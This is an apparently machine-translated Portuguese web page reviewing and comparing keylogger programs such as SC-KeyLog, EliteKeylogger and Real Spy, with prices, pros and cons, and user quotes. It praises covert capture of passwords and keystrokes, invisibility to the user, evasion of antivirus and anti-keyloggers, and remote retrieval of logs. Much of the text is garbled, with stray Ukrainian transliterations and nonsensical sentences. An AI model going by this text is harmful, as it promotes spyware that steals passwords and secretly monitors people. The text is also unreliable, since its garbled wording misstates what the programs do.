Ardamax Keylogger 2.9Sem custo3 tecladosSonsperdão
Monitor Pessoal NS Keylogger 3.8Sem custoTudoSonsperdão
Espião KGBPagoTeclado Z + programas abertosVuzkysimples
Golden Keylogger 1.32Sem custo3 tecladosMuito estreitosimples

Com base nas características dessas tabelas, é fácil escolher o programa mais adequado para um programa específico.

O relatório sobre este utilitário é dado abaixo.

SC-KeyLog

O objetivo é o volume do programa funcional do shpigun, pois ele se expande sem custo.

Krim vіdstezhennya sem informações intermediárias, scho para ser digitado a partir do teclado, você também pode escolher os endereços dos sites que você vê, senhas e as janelas que você digita no navegador.

Forneça novas informações sobre todas as atividades exibidas no computador. Com a ajuda da moldagem, o arquivo pode ser visualizado de um local diferente.

  • Possibilidade de acesso remoto a um arquivo de outro anexo;
  • Vіdsutnіst sіlіdіv dіyalnostі programas no computador para a configuração correta;
  • A diversidade de dados escolhidos - informações práticas sobre todas as atividades em um PC podem estar disponíveis.
  • Salve senhas apenas superiores a NT0;
  • Menu muito simples e design antiestético;
  • Finalize o formato não manual para o resultado.

E o que parece coristuvachi, yakі software ativamente vikoristuyut tsey? "Absolutamente incompreensível para um koristuvach", "Daniel está certo em vir aos correios".

Keylogger prático WideStep

O programa Tsya se expande mentalmente sem custo. O preço da nova versão paga é de 35 dólares.

Dosit tsіkava esse programa funcional, como custar seus centavos, se você estiver pronto para pagá-los.

Arroz Vіdmіnna– edifício para corrigir os dados registrados com a periodicidade designada. Em outros casos é normal, muitas vezes, estável para outros programas desta lista.

  • Seleção de informações de vários tipos;
  • Povna invisibilidade de robôs do computador do coristuvach;
  • Interface simples e keruvannya.
  • O design é mais curto, mais baixo no programa frontal, mas nem tudo está em cima;
  • O formato de exibição do resultado não é manual;
  • A versão paga custa muito.

Dê uma olhada no software pré-selecionado como este: “Programa inteligente, simples e funcional. Dosit não se lembra da hora de trabalho.

Espião real

O programa pago funcional e dobrável é de 600 rublos. No entanto, pode haver uma versão demo, que pode ser usada sem custo.

Características de qual software- Saúde na hora do período de tarefas.

Ajuda a resolver o problema da introdução de uma senha/chave gráfica, pois o resto da hora começou a se espalhar amplamente.

  • Tipos anônimos de informações coletadas, além da capacidade de fazer capturas de tela da tela durante o período de agendamento;
  • Há um grande número de outras funções e recursos adicionais;
  • Anote yak dії, e ª hora vikonannya;
  • Criptografa o log de formação.
  • Trivalidade de trabalho (seleção de informações) para a versão demo gratuita para se tornar 40 penas;
  • Pague mais amplo, se você quiser um preço maior ou menor é aceitável;
  • Para terminar o programa é ótimo.

Os comentários dos correspondentes sobre este programa são os seguintes: “O programa é reconhecido. Programadores bem feitos!

EliteKeylogger

Programa pago com preço alto- 69 dólares. Dіє no PC será insondável no modo de baixo nível, então pode não aparecer.

Tsіkava essa singularidade zruchna- Lançamento automático do software, que inicia imediatamente após o lançamento do próprio sistema.

Funciona bem ou não aparece com anti-keyloggers especiais.

  • Povnistyu prihovana diya que skladnіstі v vyyavlennі;
  • O formato do robô é do tipo de driver de baixo nível e partida automática na hora de ocupação do sistema;
  • Vіdstezhuє і takozh i natiskannya não apenas o principal, mas os botões de serviço no teclado.
  • Sistema de instalação de software dobrável Dosit no PC;
  • O programa é de alta qualidade, mas na Internet russa você pode encontrar a versão antiga do mal;
  • Dosit sistema desmontável de programas indivіdualnykh nashtuvan, yak, vtіm, virtuoso você mesmo.

O que parece coristuvachi sobre este software? "Bom programa", "Trochs não chegam ao Jetlogger".

O rato!

Dosit expandido e popular, utilitário funcional com uma licença paga.

No entanto, espera-se uma versão demo gratuita com um período de tempo limitado para uma voz privada.

O programa é muito simples- escreva isso você mesmo, talvez algum tipo de koristuvach pegajoso. Tim não é menos, é quase impossível para antivírus e programas especiais que detectam esse tipo de software.

  • Simplicidade, funcionalidade e alta estabilidade de trabalho;
  • A quantidade mínima de espaço para o arquivo, pois ele empresta no computador;
  • Para finalizar o bagato nalashtuvan.
  • Termine um design inaceitável, pisque nas cores preta, branca e vermelha;
  • Deshcho funcional mais cedo, mais baixo nos programas descritos anteriormente;
  • Uma revisão sem manuseio da revista e um vislumbre de uma interface sem manuseio e uma vitória.

Coristuvachi fala sobre esse programa assim: “A prática é estável, a cerveja é simples”, “O programa é bom, permite coletar dados sem memória”.

SPYGO

O preço de um novo keylogger, atribuições de trabalho e divisão por um programador russo.

© 2022 androidas.ru - Tudo sobre Android